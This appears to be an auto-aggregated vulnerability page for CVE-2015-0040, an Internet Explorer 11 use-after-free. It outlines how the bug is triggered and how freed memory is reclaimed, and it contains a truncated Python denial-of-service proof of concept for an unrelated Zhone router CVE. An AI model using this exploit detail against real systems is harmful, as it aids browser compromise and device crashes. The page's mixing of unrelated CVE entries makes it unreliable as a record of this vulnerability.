CVE-2015-0040
Published: 2015-02-11
Priority: P261 · critical · CVSS 2.0 score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 30.04% (98.0th percentile)
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0037, and CVE-2015-0066.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
Detection & IOCs (extracted from sources)
- Exploit pattern involves creating a container element with children in the order: map, applet, map, then appending it to the DOM document to trigger the vulnerable readystatechange interrupt sequence.
- After the use-after-free is triggered, the freed CMapElement memory (about 0x190 bytes, the size of a video element) is reclaimed by allocating and discarding video elements in a loop to force MemoryProtect to release the object; monitor for mass video element creation in IE11 JavaScript.
- Disabling JavaScript in Internet Explorer 11 prevents an attacker from triggering the vulnerable code path for CVE-2015-0040 / MS15-009.
- The researcher was unable to prove full exploitability beyond reasonable doubt; the linked-list corruption and use-after-free were demonstrated, but a complete weaponized exploit chain was not confirmed.
- Other CElement::Notify implementations for various element types may also be vulnerable to the same reentrancy issue, but were not exhaustively reverse-engineered.
- The NVD source document is for CVE-2015-0066, not CVE-2015-0040; CVE-2015-0040 is only referenced as a related but distinct vulnerability in that entry.
GHSA advisories
- GHSA-f77x-8486-m8vx (CVE-2015-0066, CRITICAL; ghsa_unreviewed · 2022-05-14 · CVSS 9.3): Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0037, and CVE-2015-0040.
- GHSA-c5wh-gw3c-mrf3 (CVE-2015-0040, CRITICAL; ghsa_unreviewed · 2022-05-14 · CVSS 9.3): Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0037, and CVE-2015-0066.
- GHSA-q2vh-mj5j-gf95 (CVE-2015-0037, CRITICAL; ghsa_unreviewed · 2022-05-14 · CVSS 9.3): Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0040, and CVE-2015-0066.
- GHSA-hpw3-wqfm-fjh6 (CVE-2015-0018, CRITICAL; ghsa_unreviewed · 2022-05-14 · CVSS 9.3): Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0037, CVE-2015-0040, and CVE-2015-0066.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 11 - MSHTML CMapElement::Notify Use-After-Free (MS15-009)
exploitdb · 2016-11-14 · CVE-2015-0040
---
Element::Notify functions to make another such call, and at least one of these functions is non-reentrant. This can have various repercussions, e.g. when an attacker triggers this vulnerability using a CMapElement object, a reference to that object can be stored in a linked list and the object itself can be freed. This pointer can later be re-used to cause a classic use-after-free issue.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted web page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
Description
When a DocumentFragment containing an
Exploit-DB
Zhone GPON 2520 R4.0.2.566b - Crash (PoC)
exploitdb · 2015-01-21 · CVE-2015-2055
---
```python
from httplib2 import Http
from urllib import urlencode
import sys,time
#main function
if __name__ == "__main__":
    if(len(sys.argv) != 2):
        print '*********************************************************************************'
        print ' GPON Zhone R4.0.2.566b D.O.S.'
        print ' Tested on'
        print ' GPON Zhone 2520'
        print ' Hardware: 0040-48-02'
        print ' Software: R4.0.2.566b'
        print ' '
        print ' Usage : python', sys.argv[0] + ' '
        print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
        print ' Author : Kaczinski [email protected] '
        print ' URL : http://www.websec.mx/advisories'
        print '*********************************************************************************'
        sys.exit()
    HOST = sys.argv[1]
    LIMIT = 100000
    COUNT = 1
    SIZE = 10
    BUFFER = ''
    while len(BUF
```
References
- http://blog.skylined.nl/20161114001.html
- http://www.securityfocus.com/archive/1/539752/100/0/threaded
- http://www.securityfocus.com/bid/72410
- http://www.securitytracker.com/id/1031723
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-009
- https://www.exploit-db.com/exploits/40757/